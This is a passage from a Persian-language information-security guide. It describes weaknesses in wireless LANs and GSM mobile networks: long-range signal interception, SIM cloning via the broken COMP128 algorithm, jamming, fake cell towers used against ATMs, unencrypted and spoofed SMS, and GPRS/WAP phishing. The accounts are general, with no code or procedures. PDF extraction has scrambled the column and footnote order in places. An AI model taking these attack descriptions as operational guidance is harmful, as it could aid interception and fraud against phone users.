ﺑﻲﻭﺍﺳﻄﻪ ﻭ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﻫﺴﺘﻨﺪ .ﺍﻳﻦ ﻣـﺴﺌﻠﻪ ﺑـﻪ
ﺍﻳﻦ ﻣﻌﻨﻲ ﺍﺳﺖ ﻛﻪ ﻫﺮ ﻧﻘﻄﺔ ﺳﻴﺎﺭ ﻗﺎﺩﺭ ﺍﺳﺖ ﻳﻚ ﻓﺎﻳـﻞ
ﻳﺎ ﺑﺮﻧﺎﻣﺔ ﺧﻄﺮﻧﺎﻙ ﺭﺍ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺷﻤﺎ ﻣﻨﺘﻘﻞ ﻛﻨﺪ.
١٩٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﮔﺴﺘﺮﺵ ﺍﺳﺖ ﻛﻪ ﺍﻣﻨﻴﺖ ﺗﻤﺎﻡ ﺷﺮﻛﺘﻬﺎ ﻭ ﻣﺆﺳﺴﺎﺗﻲ ﻛـﻪ ﺩﺍﺭﺍﻱ
ﺷﺒﻜﻪ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻫﺴﺘﻨﺪ ﺭﺍ ﺗﻬﺪﻳﺪ ﻣﻲﻛﻨﺪ.
ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺭﺍﻫﺒﺮ ﺷﺒﻜﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻭ ﺍﺳـﺘﻘﺮﺍﺭ
ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﺑﺒﻴﻨﺪ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻗﺎﺑﻞ ﺣﻤـﻞ ﺗﻨﻬـﺎ ﺩﺭ
ﻓﺎﺻﻠﺔ ﻣﺤﺪﻭﺩﻱ ﺍﺯ ﻧﻘﺎﻁ ﺩﺳﺘﺮﺳﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺷـﺒﻜﻪ ﻣﺘـﺼﻞ
ﺷﻮﻧﺪ ﻭ ﺩﺭﻧﺘﻴﺠﻪ ﮔﻤﺎﻥ ﻛﻨﺪ ﻛﻪ ﺳﻴﮕﻨﺎﻟﻬﺎﻱ ﺷﺒﻜﻪ ﺩﺭ ﻓﻮﺍﺻـﻠﻲ
ﺩﻭﺭﺗﺮ ﺍﺯ ﺁﻥ ﻓﺎﺻﻠﻪ ﻗﺎﺑـﻞ ﺩﺳﺘﺮﺳـﻲ ﻧﻴـﺴﺘﻨﺪ ،ﺍﻣـﺎ ﺍﻳـﻦ ﻓـﺮﺽ
ﻧﺎﺩﺭﺳﺖ ﺍﺳﺖ .ﺩﺭ ﺣﻘﻴﻘﺖ ﺳﻴﮕﻨﺎﻟﻬﺎ ﺩﺭ ﻃﻮﻝ ﻫﺰﺍﺭﺍﻥ ﻣﺘﺮ -ﺗـﺎ
ﺟﺎﻳﻲ ﻛﻪ ﭼﻴﺰﻱ ﺁﻧﻬﺎ ﺭﺍ ﻣﻨﺤﺮﻑ ﻳﺎ ﺩﭼـﺎﺭ ﻭﻗﻔـﻪ ﻧﻜﻨـﺪ -ﻗﺎﺑـﻞ
ﺩﺭﻳﺎﻓﺖ ﻫﺴﺘﻨﺪ .ﺩﻟﻴﻞ ﺁﻥ ﺍﺳﺘﺪﻻﻝ ﻏﻠﻂ ﺍﻳـﻦ ﺍﺳـﺖ ﻛـﻪ ﺁﻧـﺘﻦ
ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﺔ ﻗﺎﺑﻞ ﺣﻤـﻞ ﻧﻤـﻲﺗﻮﺍﻧـﺪ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺿـﻌﻴﻒ ﺭﺍ
ﺩﺭﻳﺎﻓﺖ ﻛﻨﺪ؛ ﺍﻣﺎ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺁﻧﺘﻦ ﺧﺎﺭﺟﻲ ،ﻣﻲﺗـﻮﺍﻥ ﺑـﺮﺩ
ﻻ ﺑﮕﻮﻧﻪﺍﻱ
ﺳﻴﮕﻨﺎﻟﻬﺎ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﺍﺩ .ﺑﺨﺶ ﺑﻲﺳﻴﻢ ﺷﺒﻜﻪ ﻣﻌﻤﻮ ﹰ
ﺍﺳﺖ ﻛﻪ ﻧﻔﻮﺫﮔﺮ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺗﺮﺍﻓﻴﻚ ﺁﻥ ﻧﻴﺎﺯﻱ ﻧﺪﺍﺭﺩ ﺑﻪ
ﭼﻴﺰﻱ ﺩﺳﺘﺮﺳﻲ ﻓﻴﺰﻳﻜﻲ ﭘﻴﺪﺍ ﻛﻨﺪ .ﺑﻪ ﻫﻤﻴﻦ ﺩﻟﻴﻞ ﺍﻳﻦ ﺷﺒﻜﻪﻫﺎ
ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻼﺗﻲ ﭼـﻮﻥ ﺩﺯﺩﻱ ﭘﻴـﺎﻡ ،ﺗﻐﻴﻴـﺮ ﭘﻴـﺎﻡ ،ﻳـﺎ ﺍﺭﺳـﺎﻝ
ﭘﺎﺭﺍﺯﻳﺖ ﻣﻴﺎﻥ ﭘﻴﺎﻡ ،ﺩﺍﺭﺍﻱ ﺿﻌﻒ ﻫﺴﺘﻨﺪ.
ﻣﺴﺎﺋﻞ ﻣﺬﻛﻮﺭ ﺍﻫﻤﻴﺖ ﭘﺮﺩﺍﺧﺘﻦ ﺑﻪ ﻣﺴﺌﻠﻪ ﺍﻣﻨﻴﺖ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ
ﺑﻲﺳﻴﻢ ﺭﺍ ﺭﻭﺷﻦ ﻣﻲﻛﻨﻨﺪ .ﻫﺮﻳﻚ ﺍﺯ ﺿﻌﻔﻬﺎﻱ ﻓﻮﻕ ﺭﺍ ﻣﻲﺗﻮﺍﻥ
ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻣﻨﺎﺳـﺐ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﺗﺠﺮﺑﻴـﺎﺕ ﺍﻣﻨﻴﺘـﻲ ،ﻃﺮﺍﺣـﻲ
ﺷﺒﻜﻪ ،ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ ﻛـﺎﺭﺑﺮﺩﻱ ﺍﻣﻨﻴﺘـﻲ ﻭ ﭘﻴﻜﺮﺑﻨـﺪﻱ ﺻـﺤﻴﺢ
ﻛﻨﺘﺮﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻩ ﻭ ﻳـﺎ ﺍﺯ ﺑـﻴﻦ ﺑـﺮﺩ .ﺁﺧـﺮﻳﻦ
ﻓﺼﻠﻬﺎﻱ ﺑﺨﺶ ﺳﻮﻡ ﺑﻪ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑـﺎﺭﺓ ﻧﺤـﻮﺓ ﺍﻣـﻦ ﻛـﺮﺩﻥ
ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﻲﺳﻴﻢ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ.
ﺩ.
ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﺩﺭ ﺍﺭﻭﭘﺎGSM :
GSMﮔﺴﺘﺮﺩﻩﺗﺮﻳﻦ ﻭ ﺩﺭﺣﺎﻝ ﺭﺷﺪﺗﺮﻳﻦ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ
ﺩﻳﺠﻴﺘﺎﻝ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺟﻬﺎﻥ ﺍﺳﺖ .ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﭼﻴـﺰﻱ
ﻧﺰﺩﻳﻚ ﺑﻪ ۶۰۰ﻣﻴﻠﻴﻮﻥ ﻣﺸﺘﺮﻙ GSMﺩﺭ ﺩﻧﻴﺎ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ -
ﺭﻗﻤﻲ ﺑﻴﺶ ﺍﺯ ﺩﻭ ﺳﻮﻡ ﺗﻌـﺪﺍﺩ ﻛـﻞ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺳـﻴﺎﺭﻱ ﻛـﻪ ﺩﺭ
ﺟﻬﺎﻥ ﻣﻮﺟﻮﺩ ﺍﺳﺖ ١٦٢.ﺍﻳﻦ ﺭﻗﻢ ﺑﺎ ﺳﺮﻋﺖ ﭼﻬﺎﺭ ﻛﺎﺭﺑﺮ ﺟﺪﻳﺪ ﺩﺭ
۱۶۲ﺳﻴﺴﺘﻢ GSMﺁﻣﺮﻳﻜﺎﻱ ﺷﻤﺎﻟﻲ ﺩﺭﺣـﺎﻝ ﺣﺎﺿـﺮ ﻫﻨﮕـﺎﻡ ﺍﺭﺗﺒـﺎﻁ ﺑـﺎ
ﺧﺪﻣﺎﺕ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺑﺎ ﺳـﺮﻋﺖ 1900MHzﻛـﺎﺭ ﻣـﻲﻛﻨـﺪ.
ﺧﺪﻣﺎﺕ ﺩﺍﺩﻩﺍﻱ GSMﻋﺒﺎﺭﺗﻨـﺪ ﺍﺯ Short Message ) SMS
Analog Cellular Switched ) CSD ،(Servise
General
Packet
Radio
،(Dataﻭ ) GPRS
.(Serviceﺑﻴﺸﺘﺮ ﺷﺮﻛﺘﻬﺎﻱ ﺍﺭﺍﺋﻪﻛﻨﻨﺪﺓ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻫﻤﺮﺍﻩ ﮔﻮﻧـﻪ-
ﺍﻱ ﺍﺯ GSMﺭﺍ ﺑﻜــﺎﺭ ﻣــﻲﺑﺮﻧــﺪ ﻛــﻪ ﻳــﺎ ﺩﺭ 900MHzﻭ ﻳــﺎ ﺩﺭ
ﺛﺎﻧﻴﻪ ﺩﺭﺣﺎﻝ ﺍﻓﺰﺍﻳﺶ ﺍﺳﺖ .ﭘﻮﺷﺶ GSMﻫﻤﺔ ﻗـﺎﺭﻩﻫـﺎ ﺭﺍ ﺩﺭ
ﻱ ﻣﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﺓ ۴۰۰ﺍﺭﺍﺋـﻪﻛﻨﻨـﺪﺓ
ﺑﺮ ﻣﻲﮔﻴﺮﺩ ،ﺑﻄﻮﺭﻳﻜﻪ ﻓﻨﺎﻭﺭ ﹺ
ﺧﺪﻣﺎﺕ ﺩﺭ ﺑﻴﺶ ﺍﺯ ۱۷۰ﻛﺸﻮﺭ ﺩﻧﻴﺎ ﺍﺳﺖ .ﺍﻣـﺎ ﺍﻳـﻦ ﺗﻨﻬـﺎ ﺁﻏـﺎﺯ
ﺍﻧﻘﻼﺏ ﻓﻨﺎﻭﺭﻱ ﺑﻲﺳﻴﻢ ﺍﺳﺖ.
ﻣﺤﻘﻘﺎﻥ ﺻﻨﻌﺘﻲ ﭘﻴﺶﺑﻴﻨﻲ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺗﺎ ﭘﺎﻳﺎﻥ ﺳﺎﻝ ۲۰۰۵ﺩﺭ
ﺣﺪﻭﺩ ۱،۴ﻣﻴﻠﻴﺎﺭﺩ ﻛﺎﺭﺑﺮ GSMﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺗﻠﻔﻨﻬـﺎﻱ
GSMﺩﺭ ﺩﺍﺧﻞ ﺧـﻮﺩ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻛـﺎﺭﺕ ﻛﻮﭼـﻚ ﻫﻮﺷـﻤﻨﺪ
ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﺸﺨﺼﺎﺕ ﺗﻠﻔﻦ ﺭﺍ ﺩﺭ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﺪ ﻭ ﺑﻪ ﻧـﺎﻡ
ﻭﺍﺣﺪ ﺷﻨﺎﺳﺎﻳﻲ ﻣﺸﺘﺮﻱ ) ١٦٣(SIMﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ SIM .ﺑﺎﻳـﺪ
ﺍﺯ ﻣﺸﺨﺼﺎﺕ ﺑﺼﻮﺭﺕ ﻣﺤﺮﻣﺎﻧـﻪ ﻭ ﺭﻣﺰﻧﮕـﺎﺭﻱﺷـﺪﻩ ﻧﮕﻬـﺪﺍﺭﻱ
ﻛﻨﺪ؛ ﻟﺬﺍ ﺑﻪ ﻛﺎﺭﺕ SIMﻫﻢ ﻣﻲﺗﻮﺍﻥ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﻗﻮﺕ ﻭ
ﻫﻢ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﻧﻘﻄﺔ ﺿﻌﻒ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ ﻓﻨـﺎﻭﺭﻱ GSMﻧﮕـﺎﻩ
ﻛﺮﺩ.
ﻧﻘﺎﻁ ﺿﻌﻒ GSM
ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻛﺎﺭﺕ SIM
ﺩﺭ ﺳﻴﺴﺘﻤﻬﺎﻱ GSMﺁﻣﺮﻳﻜﺎ ﻭ ﺍﺭﻭﭘﺎ ،ﺭﻭﺵ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﺷﺒﻜﻪ
ﻳﻜﺴﺎﻥ ﺍﺳﺖ .ﻛﺎﺭﺗﻬـﺎﻱ ﻫﻮﺷـﻤﻨﺪ ﻗﺎﺑـﻞ ﺟﺎﺑﺠـﺎﻳﻲ ﺩﺭ ﺗﻠﻔﻨﻬـﺎ
)ﻛﺎﺭﺗﻬﺎﻱ (SIMﺑﺮﺍﻱ ﻧﮕﻬﺪﺍﺭﻱ ﺷﻤﺎﺭﻩﻫـﺎﻱ ﺗﻤـﺎﺱ ،ﺍﻃﻼﻋـﺎﺕ
ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ،ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺟﺎﻧﺒﻲ ﻣﺜﻞ ﻣﺮﻭﺭﮔـﺮ ﻭﺏ ﺑﻜـﺎﺭ
ﻣﻲﺭﻭﻧﺪ .ﺩﺍﺩﻩﻫﺎﻱ ﺫﺧﻴﺮﻩﺷﺪﻩ ﺩﺭ ﻛﺎﺭﺗﻬﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻣـﻲﺷـﻮﻧﺪ،
ﺍﻣﺎ ﺍﻟﮕﻮﺭﻳﺘﻢ COMP128ﻛﻪ ﺩﺭ ﺍﻳﻨﻜﺎﺭ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﭘـﻴﺶ ﺍﺯ
ﺍﻳﻦ ﺷﻜﺴﺘﻪ ﺷﺪﻩ ﻭ ﻟﺬﺍ ﺍﻳﻦ ﻛﺎﺭﺗﻬﺎ ﺩﺭ ﺑﺮﺍﺑﺮ ﻛﭙﻲﺑﺮﺩﺍﺭﻱ )ﺳـﺎﺧﺖ
ﻳﻚ ﻧﺴﺨﺔ ﻣﺸﺎﺑﻪ ﺍﺯ ﺧـﻮﺩ( ﺍﻳﻤـﻦ ﻧﻴـﺴﺘﻨﺪ War driving .ﺑـﺮﺍﻱ
ﻣﺸﺘﺮﻛﻴﻦ ﺗﻠﻔﻨﻬـﺎﻱ ﻫﻤـﺮﺍﻩ ﻛـﻪ ﺍﺯ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩ GSMﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ ﻣﺴﺌﻠﻪ ﺧﻄﺮﻧﺎﻛﻲ ﻧﻴﺴﺖ .ﻣﺴﺘﻘﻞ ﺍﺯ ﻃﻴﻒ ﻓﺮﻛﺎﻧﺴﻲ ،ﺑﺎ
ﺍﺭﺳﺎﻝ ﭘﺎﺭﺍﺯﻳﺖ ﺑﺮﺍﺣﺘﻲ ﻣﻲﺗـﻮﺍﻥ ﺳـﻴﮕﻨﺎﻟﻬﺎﻱ ﺗﻠﻔـﻦ ﻫﻤـﺮﺍﻩ ﺭﺍ
ﺩﭼﺎﺭ ﻭﻗﻔﻪ ﻛﺮﺩ .ﻳﻚ ﺭﻭﺵ ﺑﺴﻴﺎﺭ ﻣﻌﺮﻭﻑ ﺑﺮﺍﻱ ﺑﺪﺳـﺖ ﺁﻭﺭﺩﻥ
ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﺓ ﮔﻔﺘﮕﻮﻱ ١٦٤GSMﺩﺭ ﻛﻤﺘﺮ ﺍﺯ ﻳﻚ ﺛﺎﻧﻴﻪ
ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺁﻥ ﺍﺯ ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺷﺨﺼﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ.
1800MHzﻛﺎﺭ ﻣﻲﻛﻨﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻛـﺸﻮﺭﻫﺎﻱ ﺍﺭﻭﭘـﺎﻳﻲ ﻣـﻲ-
ﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻣﺪﺍﺭ ﺳﻮﺋﻴﭽﻲ ﭘﺮﺳـﺮﻋﺖ ﺩﺍﺩﻩ ) High Speed Circuit
(HSCSD ،Switched Dataﺍﺳــﺘﻔﺎﺩﻩ ﻛﻨﻨــﺪ ،ﻛــﻪ ﻣــﻲﺗﻮﺍﻧــﺪ
ﻛﺎﻧﺎﻟﻬــﺎﻱ ﺍﺭﺗﺒــﺎﻃﻲ ﻣﺨﺘﻠــﻒ ﺭﺍ ﺩﺭ ﻳــﻚ ﻛﺎﻧــﺎﻝ ﺑــﺎ ﻗﺎﺑﻠﻴــﺖ ﻛــﺎﺭ
38.4KBPSﺍﺩﻏﺎﻡ ﻛﻨﺪ GPRS .ﺩﺭ ﺑﻴﺸﺘﺮ ﻛﺸﻮﺭﻫﺎ ﻭﺟﻮﺩ ﺩﺍﺭﺩ.
163 Subscriber Identification Module
164 Encrypted GSM Conversation Key
١٩١
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ GSMﺑﺴﺘﮕﻲ ﺑﻪ ﺷﺮﺍﻳﻂ ﺩﺍﺭﺩ .ﺍﺯ ﻛـﺎﺭﺕ SIM
ﻣﻲﺗﻮﺍﻥ ﻧﺴﺨﺔ ﺑﺪﻝ ﺍﻳﺠﺎﺩ ﻧﻤـﻮﺩ .ﻧﻔـﻮﺫ ﺑـﻪ ﺁﻥ ﻧﻴـﺰ ﺍﻣﻜﺎﻧﭙـﺬﻳﺮ
ﺍﺳﺖ؛ ﭼﺮﺍﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺣﺴﺎﺱ ﺁﻥ ﺷﻜﺴﺘﻪ ﺷـﺪﻩﺍﻧـﺪ .ﺍﻳـﻦ
ﻣﺸﻜﻞ ﺁﺧﺮ ﻣﻲ ﺗﻮﺍﻧﺪ ﺑﻪ ﻧﺎﺍﻣﻦ ﺷـﺪﻥ ﻛﺎﻣـﻞ ﻣﻜﺎﻟﻤـﺎﺕ ﺗﻠﻔﻨـﻲ
GSMﻧﻴﺰ ﻣﻨﺠﺮ ﺷﻮﺩ.
ﺩﺭ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﺓ ﻳــﻚ ﺑﺎﻧــﻚ ﺍﺯ ﻓﻨــﺎﻭﺭﻱ GSMﻣــﺸﻜﻼﺕ
ﺩﻳﮕﺮﻱ ﻫﻢ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺑﺮﺍﻱ ﻣﺜﺎﻝ ﺍﮔﺮ ﻳﻚ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ
ﺭﺍﻩ ﺩﻭﺭ ﻧﺘﻮﺍﻧﺪ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﻣﺨﺎﺑﺮﺍﺗﻲ ﻭﺍﻗﻌﻲ ﺍﺭﺗﺒﺎﻁ ﺑﺮﻗـﺮﺍﺭ ﻛﻨـﺪ،
ﻣﻲﺗﻮﺍﻥ ﺁﻧﺮﺍ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﻳﻚ ﺑﺮﺝ ﺟﻌﻠﻲ ﻓﺮﻳﺐ ﺩﺍﺩ.
ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻧﻔﻮﺫﮔﺮ ﺍﻣﻜﺎﻥ ﻛﻨﺘﺮﻝ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﺍﻧﺠـﺎﻡ
ﮔﺮﻓﺘﻪ ﺩﺭ ﺁﻥ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩﭘﺮﺩﺍﺯ ﺭﺍ ﭘﺪﻳﺪ ﺧﻮﺍﻫﺪ ﺁﻭﺭﺩ.
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ SMS
GSMﺧﺪﻣﺎﺕ ﭘﻴﺎﻣﻬﺎﻱ ﻛﻮﺗﺎﻩ ) (SMSﺭﺍ ﻧﻴﺰ ﺍﺭﺍﺋﻪ ﻣﻲ ﺩﻫﺪ.
SMSﺩﺭ ﺳﻴﺴﺘﻢ GSMﻛﺎﺭﺑﺮﺩﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺩﺍﺭﺩ ،ﺍﺯ ﺟﻤﻠﻪ
ﺍﻋﻼﻧﻬﺎﻱ ﭘﺴﺖ ﺻﻮﺗﻲ ،ﺑﻪ ﺭﻭﺯﺭﺳﺎﻧﻲ SIMﻣـﺸﺘﺮﻱ ،ﺍﺭﺳـﺎﻝ
ﭘﻴﺎﻣﻬــﺎﻱ ﻛﻮﺗــﺎﻩ ﻣﺘﻨــﻲ ،ﻭ ﺍﺭﺗﺒــﺎﻁ ﺑــﺎ ﺩﺭﻭﺍﺯﻩﻫــﺎﻱ ﭘــﺴﺖ
ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ .ﺑﺎ ﻭﺟﻮﺩ ﺍﻳﻨﻜﻪ ﻣـﻮﺍﺭﺩ ﻓـﻮﻕ ﺧـﺪﻣﺎﺕ ﭘﺮﻛـﺎﺭﺑﺮﺩﻱ
ﻫﺴﺘﻨﺪ ،ﺍﻣﺎ ﻣﺨﺎﻃﺮﺍﺕ ﺍﻣﻨﻴﺘـﻲ ﺟﺪﻳـﺪﻱ ﺑـﺮﺍﻱ ﺷـﺒﻜﻪ ﺑﻮﺟـﻮﺩ
ﻣﻲﺁﻭﺭﻧﺪ SMS .ﻧﻮﻋﻲ ﺳﺮﻭﻳﺲ ﺫﺧﻴﺮﻩ ﻭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺍﺳﺖ ﻛﻪ
ﺫﺍﺗﹰﺎ ﻧﺎﺍﻣﻦ ﻣﻲﺑﺎﺷﺪ ،ﭼﺮﺍﻛﻪ ﺩﺭ ﺁﻥ ﺗﻤﺎﻡ ﭘﻴﺎﻣﻬﺎ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ
ﻭ ﺭﻣﺰﻧﺸﺪﻩ ﺗﺒﺎﺩﻝ ﻣﻲﺷﻮﻧﺪ ﻭ ﺫﺧﻴﺮﻩﺳﺎﺯﻱ ﺁﻧﻬﺎ ﺩﺭ ﻣﺮﻛﺰ SMS
ﭘﻴﺶ ﺍﺯ ﺍﺭﺳﺎﻝ ﺑﻪ ﻣﻘﺼﺪ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺭﻣﺰﻧﺸﺪﻩ ﺍﺳـﺖ .ﺍﺯ ﺩﻳﮕـﺮ
ﻣﺸﻜﻼﺕ SMSﺗﺄﺧﻴﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﭘﻴﺎﻡ ﺑـﻪ ﻣﻘـﺼﺪ ﻣـﻲﺑﺎﺷـﺪ.
ﺗﺮﺍﻛﻨﺸﻬﺎﻳﻲ ﻛﻪ ﺍﺯ ﻧﻈﺮ ﺯﻣﺎﻧﻲ ﺍﻫﻤﻴﺖ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ﻧﻤـﻲﺗﻮﺍﻧﻨـﺪ
ﺑﻪ ﺍﻳﻦ ﺳﺮﻭﻳﺲ ﺍﻃﻤﻴﻨﺎﻥ ﻛﻨﻨﺪ .ﺍﺯ ﻃﺮﻑ ﺩﻳﮕـﺮ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺭﺍﻳﮕﺎﻥ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣـﻲﺗـﻮﺍﻥ ﺑﻮﺳـﻴﻠﺔ ﺁﻧﻬـﺎ SMS
ﺟﻌﻠﻲ ﺳﺎﺧﺖ ،ﺑﻪ ﮔﻮﺷﻲﻫﺎ ﻭ ﻣﺮﺍﻛﺰ SMSﺳـﻴﻠﻲ ﺍﺯ ﺑﻤﺒﻬـﺎﻱ
SMSﻓﺮﺳﺘﺎﺩ ،ﻭ ﻳﺎ ﺑﺴﺘﻪﻫﺎﻱ SMSﺭﺍ ﺑﮕﻮﻧﻪﺍﻱ ﻃﺮﺍﺣﻲ ﻛﺮﺩ
ﻛﻪ ﻣﻨﺠﺮ ﺑﻪ ﺧﺮﺍﺑﻲ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﮔﻮﺷﻲﻫﺎ ﺷﻮﻧﺪ.
ﻓﻨﺎﻭﺭﻱ ﺟﻌﺒﻪﺍﺑﺰﺍﺭ ١٦٦(STK) SIMﻣﻲﺗﻮﺍﻧـﺪ ﺑـﺮﺍﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ
SMSﺑﻜﺎﺭ ﺭﻭﺩ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ STKﻳﻚ ﺳﺎﺯ ﻭ ﻛﺎﺭ ﺍﻣﻨﻴﺘﻲ ﻻﻳـﺔ
ﺍﻧﺘﻘﺎﻝ ١٦٧ﺍﺳﺖ ،ﻭ ﻧﻤﻲﺗﻮﺍﻧﺪ ﻣﺤﺮﻣﺎﻧﮕﻲ ﭘﺎﻳﺎﻧـﻪ ﺑـﻪ ﭘﺎﻳﺎﻧـﻪ ١٦٨ﺭﺍ
ﺗﻀﻤﻴﻦ ﻛﻨﺪ .ﻳﻚ ﺭﻭﺍﻝ ﺩﻳﮕﺮ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴـﺖ SMSﻣـﻲﺗﻮﺍﻧـﺪ
Short Message Service
SIM Toolkit Technology
Transport Layer
End-to-End Confidentiality
165
166
167
168
ﺁﺳﻴﺐﭘﺬﻳﺮﻱ GPRS
١٦٩GPRSﻧﻮﻋﻲ ﺧﺪﻣﺎﺕ ﻣﺒﺘﻨﻲ ﺑـﺮ IPﺍﺳـﺖ ﻛـﻪ ﺑﺮﻗـﺮﺍﺭﻱ
ﺍﺗﺼﺎﻝ ﺩﺍﺋﻤﻲ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺗﻀﻤﻴﻦ ﻣﻲﻛﻨﺪ .ﻣﺸﻜﻞ ﻋﻤﺪﺓ ﺍﻳﻦ
ﻣﻜﺎﻧﻴﺰﻡ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻫﻨﻮﺯ ﺑﺮﺍﻱ ﺗﻘﺎﺿﺎﻫﺎﻱ WAPﺑﻪ SMS
ﻭﺍﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ .ﻳﻚ ﺑﺴﺘﺔ SMSﺗﻘﻠﺒﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﻪ ﻳﻚ ﺗﻠﻔـﻦ
ﻓﺮﺳﺘﺎﺩﻩ ﺷﻮﺩ ﻭ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺟﻌﻠﻲ ﺭﺍ ﺑﺎﺯ ﻛﻨﺪ ،ﻭ ﻛـﺎﺭﺑﺮﺍﻥ ﺭﺍ
ﻃﻮﺭﻱ ﻓﺮﻳﺐ ﺩﻫﺪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺧﻮﺩ ﺭﺍ ﺩﺭ ﻳﻚ ﻓﺮﻡ ﻛﻪ ﮔﻤـﺎﻥ
